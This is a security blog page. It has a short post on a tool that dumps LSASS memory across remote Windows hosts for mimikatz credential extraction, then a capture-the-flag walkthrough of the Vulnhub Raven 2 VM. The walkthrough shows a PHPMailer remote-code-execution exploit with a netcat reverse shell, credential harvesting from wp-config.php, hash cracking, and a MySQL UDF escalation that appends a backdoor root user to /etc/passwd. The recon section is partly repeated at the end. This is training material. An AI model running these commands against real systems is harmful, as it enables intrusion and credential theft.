Recently, I was quite successful with using the procdump technique of dumping lsass, retrieving the dumpfile and, processing it offline to find credentials on a compromised machine.
When I used this during an engagement, this ultimately led me to obtaining DA. So ever since then, I find this very useful.
I've created a python tool to automate this. Either run this against a single target, or from a list of IPs/hostnames.
This will upload procdump, dump lsass and download the dumpfile.
Check it out here:
https://github.com/n33dle/humptydumpty/
The idea here is once you have some authenticated access in a domain. Say, local administrator on all workstations, this tool will allow you to quickly obtain lsass dumps from a list of remote machines.
I stress, dumping lsass could result in a BSOD, so take care when flying this across a network!
As a result, running each of the dump files in mimikatz could provide you with additional credentials within the network.
For example:
mimikatz # sekurlsa::Minidump humpty-10.1.1.5.dmp
Switch to MINIDUMP : 'humpty-10.1.1.5.dmp'
mimikatz # sekurlsa::logonPasswords full
Opening : 'humpty-10.1.1.5.dmp' file for minidump...
<snip>
wdigest :
* Username : victim3
* Domain : vulnerable
* Password : NonHackable
<snip>
* Username : victim2
* Domain : vulnerable
* Password : TheEarthIsRound!
<snip>
* Username : victim
* Domain : vulnerable
* Password : TheEarthIsFlat!
<snip>
}==[n33dle]>----
Monday 23 September 2019
Sunday 3 February 2019
Vulnhub Walkthrough - Raven: 2
It's been a while since I've made a post. Even longer since I've attempted another Vulnhub walk-through. Today I completed the latest boot2root from Raven.
You can download a copy of the VM from here:
https://www.vulnhub.com/entry/raven-2,269/#
So let's get straight into it.
--> MISSION
Raven 2 is an intermediate level boot2root VM. There are four flags to capture. After multiple breaches, Raven Security has taken extra steps to harden their web server to prevent hackers from getting in. Can you still breach Raven?
--> REC0N / ENUMERATION
Firstly, I find the IP address of the target machine using netdiscover. The target IP address is 192.168.253.132.
Now for a full 65K TCP port scan to get a quick idea of what ports are available:
root@kali:~# nmap -Pn -sS -n -v -p- 192.168.253.132
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-22 07:53 AEDT
Initiating ARP Ping Scan at 07:53
Scanning 192.168.253.132 [1 port]
Completed ARP Ping Scan at 07:53, 0.06s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 07:53
Scanning 192.168.253.132 [65535 ports]
Discovered open port 22/tcp on 192.168.253.132
Discovered open port 111/tcp on 192.168.253.132
Discovered open port 80/tcp on 192.168.253.132
Discovered open port 52675/tcp on 192.168.253.132
Completed SYN Stealth Scan at 07:53, 2.14s elapsed (65535 total ports)
Nmap scan report for 192.168.253.132
Host is up (0.00058s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
52675/tcp open unknown
MAC Address: 00:0C:29:C6:56:E8 (VMware)
So, we have tcp/22, tcp/80, tcp/111 & tcp/52675. I now execute an aggressive nmap scan to enumerate the services sitting behind these ports. This will also execute nmaps built-in scripts that are relevant for the discovered services.
root@kali:~# nmap -Pn -A -n -v -p- 192.168.253.132
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-22 07:54 AEDT
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 07:54
Completed NSE at 07:54, 0.00s elapsed
Initiating NSE at 07:54
Completed NSE at 07:54, 0.00s elapsed
Initiating ARP Ping Scan at 07:54
Scanning 192.168.253.132 [1 port]
Completed ARP Ping Scan at 07:54, 0.04s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 07:54
Scanning 192.168.253.132 [65535 ports]
Discovered open port 80/tcp on 192.168.253.132
Discovered open port 111/tcp on 192.168.253.132
Discovered open port 22/tcp on 192.168.253.132
Discovered open port 52675/tcp on 192.168.253.132
Completed SYN Stealth Scan at 07:54, 2.27s elapsed (65535 total ports)
Initiating Service scan at 07:54
Scanning 4 services on 192.168.253.132
Completed Service scan at 07:54, 11.02s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 192.168.253.132
NSE: Script scanning 192.168.253.132.
Initiating NSE at 07:54
Completed NSE at 07:54, 0.20s elapsed
Initiating NSE at 07:54
Completed NSE at 07:54, 0.01s elapsed
Nmap scan report for 192.168.253.132
Host is up (0.00048s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 26:81:c1:f3:5e:01:ef:93:49:3d:91:1e:ae:8b:3c:fc (DSA)
| 2048 31:58:01:19:4d:a2:80:a6:b9:0d:40:98:1c:97:aa:53 (RSA)
| 256 1f:77:31:19:de:b0:e1:6d:ca:77:07:76:84:d3:a9:a0 (ECDSA)
|_ 256 0e:85:71:a8:a2:c3:08:69:9c:91:c0:3f:84:18:df:ae (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Raven Security
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 52675/tcp status
|_ 100024 1 55774/udp status
52675/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:C6:56:E8 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 199.640 days (since Tue Jun 5 15:33:43 2018)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
From the results we can see:
WordPress Security Scanner by the WPScan Team
Version 3.4.1
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________
[+] URL: http://192.168.253.132/wordpress/
[+] Started: Sat Dec 22 09:18:01 2018
Interesting Finding(s):
[+] http://192.168.253.132/wordpress/
| Interesting Entry: Server: Apache/2.4.10 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] http://192.168.253.132/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] http://192.168.253.132/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.253.132/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] WordPress version 4.8.8 identified (Latest, released on 2018-12-13).
| Detected By: Emoji Settings (Passive Detection)
| - http://192.168.253.132/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.8.8'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.253.132/wordpress/, Match: 'WordPress 4.8.8'
[i] The main theme could not be detected.
[+] Enumerating All Plugins
[i] No plugins Found.
[+] Enumerating Config Backups
Checking Config Backups - Time: 00:00:00 <==============================================================================================================================================================================> (21 / 21) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Finished: Sat Dec 22 09:18:04 2018
[+] Requests Done: 38
[+] Cached Requests: 6
[+] Data Sent: 7.229 KB
[+] Data Received: 24.328 KB
[+] Memory used: 51.105 MB
[+] Elapsed time: 00:00:02
root@kali:~#
A few things, but first I look at the detection of an uploads directory and navigate to it. Here I find my first flag located in ../2018/11/flag3.png:
I also notice in the server response (burp screenshot) the comments reference the server as raven.local. In the past, (my GoldenEye vulnhub walkthrough was an example), sometimes you can bypass server-side filters if you address the server using it’s FQDN. To do this, I add raven.local into my local hosts file:
root@kali:~# echo "192.168.253.132 raven.local" >> /etc/hosts
This doesn’t seem to help me or lead me anywhere, but I do it anyway 😊
After looking through the site for a while, next I kick off a dirbuster directory scan. Quite a few results come back. To filter out most of the repeated subdirectories and only output the parent directories, I run the following:
root@kali:~/Documents/raven# cat DirBusterReport-raven.local-80.txt | cut -d "/" -f 2 | sort -u
--------------------------------
about.html
contact.php
css
DirBuster 1.0-RC1 - Report
Directories found during testing:
Dirs found with a 200 response:
Dirs found with a 403 response:
Files found during testing:
Files found with a 200 responce:
Files found with a 301 responce:
Files found with a 403 responce:
Files found with a 500 responce:
icons
img
index.html
js
manual
.php
Report produced on Sat Feb 02 16:51:38 AEDT 2019
service.html
team.html
vendor
wordpress
The directory that instantly sticks out is the vendor directory. Looking around I find a PATH page here http://raven.local/vendor/PATH which leads me to flag1!
flag1{a2c1f66d2b8051bd3a5874b5b6e43e21}
I noticed this is an installation directory of PHPMailer. Opening the http://raven.local/vendor/VERSION page I find it’s running version: 5.2.16.
root@kali:~# searchsploit phpmailer
--------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------------------------------------------------------------------- ----------------------------------------
PHPMailer 1.7 - 'Data()' Remote Denial of Service | exploits/php/dos/25752.txt
PHPMailer < 5.2.18 - Remote Code Execution (Bash) | exploits/php/webapps/40968.php
PHPMailer < 5.2.18 - Remote Code Execution (PHP) | exploits/php/webapps/40970.php
PHPMailer < 5.2.18 - Remote Code Execution (Python) | exploits/php/webapps/40974.py
PHPMailer < 5.2.19 - Sendmail Argument Injection (Metasploit) | exploits/multiple/webapps/41688.rb
PHPMailer < 5.2.20 - Remote Code Execution | exploits/php/webapps/40969.pl
PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - 'AIO' 'PwnScr | exploits/php/webapps/40986.py
PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution | exploits/php/webapps/42221.py
PHPMailer < 5.2.21 - Local File Disclosure | exploits/php/webapps/43056.py
WordPress PHPMailer 4.6 - Host Header Command Injection (Metasploit) | exploits/php/remote/42024.rb
--------------------------------------------------------------------------------------------------- ----------------------------------------
Cha-ching. I think I’m onto something here. Rather than using the Metasploit module, I look at the python-based exploit.
Reading through the python RCE and CVE details (https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html)
In summary, the vulnerability that is exploited exist in the mail() function within PHPMailer.
The application uses setFrom() to take input from the sending user (this should be the senders email address). Under the hood, it's using sendmail. Looking around the site further, I find the contact.php page allows input from a site visitor to enter their email address. I assume the PHPMailer program is what’s used to provide this service.
From reading the vulnerability further, it seems this vulnerable version of PHPMailer does not appropriately filter the third parameter within the sendmail command. This allows an attacker to essentially break out of the 3 parameter through escaping, and insert their own arbitrary code.
With this information, I update the exploit:
root@kali:~/Documents/raven# python 40974.py
I open another terminal and create a netcat listener on tcp/443 to accept an incoming reverse shell:
root@kali:~# nc -lvp 443
listening on [any] 443 ...
To trigger the exploit, I execute the reverse shell by navigating to the uploaded n33dle.php file:
root@kali:~/Documents/raven# curl http://192.168.253.132/n33dle.php
And there you have it, a shell. Nice.
root@kali:~# nc -lvp 443
listening on [any] 443 ...
connect to [192.168.253.131] from raven.local [192.168.253.132] 41127
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:c6:56:e8
inet addr:192.168.253.132 Bcast:192.168.253.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fec6:56e8/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:208 errors:0 dropped:0 overruns:0 frame:0
TX packets:233 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:17195 (16.7 KiB) TX bytes:28320 (27.6 KiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:91 errors:0 dropped:0 overruns:0 frame:0
TX packets:91 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:13578 (13.2 KiB) TX bytes:13578 (13.2 KiB)
$ hostname
Raven
$
As usual, I spawn a python tty shell using:
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@Raven:/var/www/html$
I also locate flag2.txt sitting in www-data’s home directory:
www-data@Raven:/var/www$ cat flag2.txt
cat flag2.txt
flag2{6a8ed560f0b5358ecf844108048eb337}
www-data@Raven:/var/www$
--> TIME TO PE
Let’s look at what OS and Kernel we’re running:
www-data@Raven:/var/www/html$ uname -ra
uname -ra
Linux Raven 3.16.0-6-amd64 #1 SMP Debian 3.16.57-2 (2018-07-14) x86_64 GNU/Linux
www-data@Raven:/var/www/html$ cat /etc/*release
cat /etc/*release
PRETTY_NAME="Debian GNU/Linux 8 (jessie)"
NAME="Debian GNU/Linux"
VERSION_ID="8"
VERSION="8 (jessie)"
ID=debian
HOME_URL="http://www.debian.org/"
SUPPORT_URL="http://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"
www-data@Raven:/var/www/html$
Debian 8 (Jessie) on Linux 3.16.0-6-amd64.
And a quick look at any additional users on the system:
www-data@Raven:/var/www/html$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
Debian-exim:x:104:109::/var/spool/exim4:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
statd:x:106:65534::/var/lib/nfs:/bin/false
sshd:x:107:65534::/var/run/sshd:/usr/sbin/nologin
michael:x:1000:1000:michael,,,:/home/michael:/bin/bash
smmta:x:108:114:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:109:115:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
mysql:x:110:116:MySQL Server,,,:/nonexistent:/bin/false
steven:x:1001:1001::/home/steven:/bin/sh
There’s a michael and steven account. Let’s see what groups they’re members of:
www-data@Raven:/home$ id steven
id steven
uid=1001(steven) gid=1001(steven) groups=1001(steven)
www-data@Raven:/home$ id michael
id michael
uid=1000(michael) gid=1000(michael) groups=1000(michael),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
www-data@Raven:/home$
Hmmm, nothing really of interest at this stage. Looking at their home drives, nothing interesting here either:
www-data@Raven:/$ ls -laR /home
ls -laR /home
/home:
total 16
drwxr-xr-x 4 root root 4096 Aug 13 13:51 .
drwxr-xr-x 22 root root 4096 Aug 13 07:38 ..
drwxr-xr-x 2 michael michael 4096 Aug 13 07:52 michael
drwxr-xr-x 2 root root 4096 Aug 13 14:20 steven
/home/michael:
total 20
drwxr-xr-x 2 michael michael 4096 Aug 13 07:52 .
drwxr-xr-x 4 root root 4096 Aug 13 13:51 ..
-rw-r--r-- 1 michael michael 220 Aug 13 07:52 .bash_logout
-rw-r--r-- 1 michael michael 3515 Aug 13 07:52 .bashrc
-rw-r--r-- 1 michael michael 675 Aug 13 07:52 .profile
/home/steven:
total 8
drwxr-xr-x 2 root root 4096 Aug 13 14:20 .
drwxr-xr-x 4 root root 4096 Aug 13 13:51 ..
www-data@Raven:/$
I run the linuxprivchecker.py tool and analyse its output. I notice the wp-config.php file is world-writable, and it has also been modified by www-data. Obviously, this has been modified by the VM creator.
Reading it’s contents, I find some local DB creds.
www-data@Raven:/var/www$ cat /var/www/html/wordpress/wp-config.php
cat /var/www/html/wordpress/wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'R@v3nSecurity');
/** MySQL hostname */
define('DB_HOST', 'localhost');
I also confirm a MySQL server is running locally:
www-data@Raven:/var/www$ netstat -tl
netstat -tl
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 *:48453 *:* LISTEN
tcp 0 0 localhost:mysql *:* LISTEN
tcp 0 0 localhost:submission *:* LISTEN
tcp 0 0 *:sunrpc *:* LISTEN
tcp 0 0 *:ssh *:* LISTEN
tcp 0 0 localhost:smtp *:* LISTEN
tcp6 0 0 [::]:54187 [::]:* LISTEN
tcp6 0 0 [::]:sunrpc [::]:* LISTEN
tcp6 0 0 [::]:http [::]:* LISTEN
tcp6 0 0 [::]:ssh [::]:* LISTEN
Let’s try connecting:
www-data@Raven:/var/www$ mysql -h localhost -u root -p
mysql -h localhost -u root -p
Enter password: R@v3nSecurity
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 41
Server version: 5.5.60-0+deb8u1 (Debian)
Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| wordpress |
+--------------------+
4 rows in set (0.00 sec)
mysql>
Awesome. Now let’s have a quick snoop around. Check the users:
mysql> use wordpress;
use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
show tables;
+-----------------------+
| Tables_in_wordpress |
+-----------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
+-----------------------+
12 rows in set (0.00 sec)
mysql> select * from wp_users;
select * from wp_users;
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| 1 | michael | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0 | michael | michael@raven.org | | 2018-08-12 22:49:12 | | 0 | michael |
| 2 | steven | $P$B6X3H3ykawf2oHuPsbjQiih5iJXqad. | steven | steven@raven.org | | 2018-08-12 23:31:16 | | 0 | Steven Seagull |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
2 rows in set (0.00 sec)
mysql>
Let's try cracking those. I output them to file on my Kali box and run john:
root@kali:~/Documents/raven# john --wordlist=/usr/share/wordlists/rockyou.txt pwords
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (phpass [phpass ($P$ or $H$) 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
While that’s running, I check what version of mysql is running:
mysql> show variables like "%version%";
show variables like "%version%";
+-------------------------+------------------+
| Variable_name | Value |
+-------------------------+------------------+
| innodb_version | 5.5.60 |
| protocol_version | 10 |
| slave_type_conversions | |
| version | 5.5.60-0+deb8u1 |
| version_comment | (Debian) |
| version_compile_machine | x86_64 |
| version_compile_os | debian-linux-gnu |
+-------------------------+------------------+
7 rows in set (0.00 sec)
Reviewing my results again from linuxprivchecker.py, I see the mysql version is vuln to the UDF local privilege escalation exploit.
...
[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...
Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!
The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system
- Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit || http://www.exploit-db.com/exploits/5720 || Language=python
- MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
...
I’ve seen and used this before. This exploit allows you to write and access files as root within mysql. This essentially allows you to own the box as you can create new users, modify existing and/or basically do anything you like!
First I download the exploit to the target using the python SimpleHTTPServer and wget.
www-data@Raven:/var/www$ wget http://192.168.253.131/1518.c
wget http://192.168.253.131/1518.c
converted 'http://192.168.253.131/1518.c' (ANSI_X3.4-1968) -> 'http://192.168.253.131/1518.c' (UTF-8)
--2019-02-03 08:18:09-- http://192.168.253.131/1518.c
Connecting to 192.168.253.131:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3378 (3.3K) [text/plain]
Saving to: '1518.c'
1518.c 100%[=====================>] 3.30K --.-KB/s in 0s
2019-02-03 08:18:09 (705 MB/s) - '1518.c' saved [3378/3378]
www-data@Raven:/var/www$
Following the exploit instructions I rename and compile it:
www-data@Raven:/var/www$ mv 1518.c n33dle.c
mv 1518.c n33dle.c
www-data@Raven:/var/www$ gcc -g -c n33dle.c
gcc -g -c n33dle.c
root@kali:~/Documents/raven# gcc -g -shared -Wl,-soname,n33dle.so -o n33dle.so n33dle.o -lc
gcc -g -shared -Wl,-soname,n33dle.so -o n33dle.so n33dle.o -lc
With the n33dle.so SUID file created, I log back into the mysql db and follow the rest of the exploit instructions.
mysql> use mysql;
use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> create table foo(line blob);
create table foo(line blob);
Query OK, 0 rows affected (0.01 sec)
mysql> insert into foo values(load_file('/var/www/n33dle.so'));
insert into foo values(load_file('/var/www/n33dle.so'));
Query OK, 1 row affected (0.02 sec)
mysql> select * from foo into dumpfile '/var/www/n33dle.so';
select * from foo into dumpfile '/var/www/n33dle.so';
ERROR 1086 (HY000): File '/var/www/n33dle.so' already exists
mysql> select * from foo into dumpfile '/usr/lib/n33dle.so';
select * from foo into dumpfile '/usr/lib/n33dle.so';
Query OK, 1 row affected (0.01 sec)
mysql> create function do_system returns integer soname 'n33dle.so';
create function do_system returns integer soname 'n33dle.so';
Query OK, 0 rows affected (0.00 sec)
mysql> select * from mysql.func;
select * from mysql.func;
+-----------+-----+-----------+----------+
| name | ret | dl | type |
+-----------+-----+-----------+----------+
| do_system | 2 | n33dle.so | function |
+-----------+-----+-----------+----------+
1 row in set (0.00 sec)
What I’ve done here is essentially link the do_system function to a SUID n33dle.so file. This can now be called within mysql to execute any system command as root. A cool trick I’ve found is creating a new root user. In the past I’ve modified the existing root user, removing the ‘x’ from /etc/passwd. This would allow me to su to root without a password. However, this will most likely break the system and cause a DoS. So instead, lets create a new root user with a password I’ve set.
On my Kali box, I create the hashed password of ‘n33dle’.
root@kali:~/Documents/raven# openssl passwd n33dle
RHV9/0Q6VW2nI
Using the hashed password above. I call the do_system function in the mysql database and echo a new line into the Raven /etc/passwd file. This creates a new root level user with a username and password of n33dle:n33dle:
mysql> select do_system('echo "n33dle:RHV9/0Q6VW2nI:0:0:root:/root:/bin/bash" >> /etc/passwd');
<ho "n33dle:RHV9/0Q6VW2nI:0:0:root:/root:/bin/bash" >> /etc/passwd');
+----------------------------------------------------------------------------------+
| do_system('echo "n33dle:RHV9/0Q6VW2nI:0:0:root:/root:/bin/bash" >> /etc/passwd') |
+----------------------------------------------------------------------------------+
| 0 |
+----------------------------------------------------------------------------------+
1 row in set (0.00 sec)
Exit out of the mysql db and it’s easy as changing to the newly created root user ‘n33dle’:
www-data@Raven:/var/www$ su n33dle
su n33dle
Password: n33dle
root@Raven:/var/www# id
id
uid=0(root) gid=0(root) groups=0(root)
root@Raven:/var/www# whoami
whoami
root
root@Raven:/var/www#
And there we have it, I’m now root! To finish it off, the final flag:
root@Raven:/var/www# cd /root
cd /root
root@Raven:~# ls
ls
flag4.txt
root@Raven:~# cat flag4.txt
cat flag4.txt
___ ___ ___
| _ \__ ___ _____ _ _ |_ _|_ _|
| / _` \ V / -_) ' \ | | | |
|_|_\__,_|\_/\___|_||_|___|___|
flag4{df2bc5e951d91581467bb9a2a8ff4425}
CONGRATULATIONS on successfully rooting RavenII
I hope you enjoyed this second interation of the Raven VM
Hit me up on Twitter and let me know what you thought:
@mccannwj / wjmccann.github.io
root@Raven:~#
The password crack ended up finishing and locating steven’s password:
root@kali:~/Documents/raven# john --wordlist=/usr/share/wordlists/rockyou.txt pwords
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (phpass [phpass ($P$ or $H$) 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
LOLLOL1 (?)
1g 0:00:41:01 DONE (2019-02-03 08:47) 0.000406g/s 5827p/s 6253c/s 6253C/s ..*7¡Vamos!
Use the "--show" option to display all of the cracked passwords reliably
Session completed
I tried to SSH as steven, but that didn’t work. Given they are WordPress creds, they did however let me login to the Wordpress admin portal. Perhaps there’s some other vuln here... Anyway, I’m done!
Hope you enjoyed.
--> n33dle
You can download a copy of the VM from here:
https://www.vulnhub.com/entry/raven-2,269/#
So let's get straight into it.
--> MISSION
Raven 2 is an intermediate level boot2root VM. There are four flags to capture. After multiple breaches, Raven Security has taken extra steps to harden their web server to prevent hackers from getting in. Can you still breach Raven?
--> REC0N / ENUMERATION
Firstly, I find the IP address of the target machine using netdiscover. The target IP address is 192.168.253.132.
Now for a full 65K TCP port scan to get a quick idea of what ports are available:
root@kali:~# nmap -Pn -sS -n -v -p- 192.168.253.132
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-22 07:53 AEDT
Initiating ARP Ping Scan at 07:53
Scanning 192.168.253.132 [1 port]
Completed ARP Ping Scan at 07:53, 0.06s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 07:53
Scanning 192.168.253.132 [65535 ports]
Discovered open port 22/tcp on 192.168.253.132
Discovered open port 111/tcp on 192.168.253.132
Discovered open port 80/tcp on 192.168.253.132
Discovered open port 52675/tcp on 192.168.253.132
Completed SYN Stealth Scan at 07:53, 2.14s elapsed (65535 total ports)
Nmap scan report for 192.168.253.132
Host is up (0.00058s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
52675/tcp open unknown
MAC Address: 00:0C:29:C6:56:E8 (VMware)
So, we have tcp/22, tcp/80, tcp/111 & tcp/52675. I now execute an aggressive nmap scan to enumerate the services sitting behind these ports. This will also execute nmaps built-in scripts that are relevant for the discovered services.
root@kali:~# nmap -Pn -A -n -v -p- 192.168.253.132
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-22 07:54 AEDT
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 07:54
Completed NSE at 07:54, 0.00s elapsed
Initiating NSE at 07:54
Completed NSE at 07:54, 0.00s elapsed
Initiating ARP Ping Scan at 07:54
Scanning 192.168.253.132 [1 port]
Completed ARP Ping Scan at 07:54, 0.04s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 07:54
Scanning 192.168.253.132 [65535 ports]
Discovered open port 80/tcp on 192.168.253.132
Discovered open port 111/tcp on 192.168.253.132
Discovered open port 22/tcp on 192.168.253.132
Discovered open port 52675/tcp on 192.168.253.132
Completed SYN Stealth Scan at 07:54, 2.27s elapsed (65535 total ports)
Initiating Service scan at 07:54
Scanning 4 services on 192.168.253.132
Completed Service scan at 07:54, 11.02s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 192.168.253.132
NSE: Script scanning 192.168.253.132.
Initiating NSE at 07:54
Completed NSE at 07:54, 0.20s elapsed
Initiating NSE at 07:54
Completed NSE at 07:54, 0.01s elapsed
Nmap scan report for 192.168.253.132
Host is up (0.00048s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 26:81:c1:f3:5e:01:ef:93:49:3d:91:1e:ae:8b:3c:fc (DSA)
| 2048 31:58:01:19:4d:a2:80:a6:b9:0d:40:98:1c:97:aa:53 (RSA)
| 256 1f:77:31:19:de:b0:e1:6d:ca:77:07:76:84:d3:a9:a0 (ECDSA)
|_ 256 0e:85:71:a8:a2:c3:08:69:9c:91:c0:3f:84:18:df:ae (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Raven Security
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
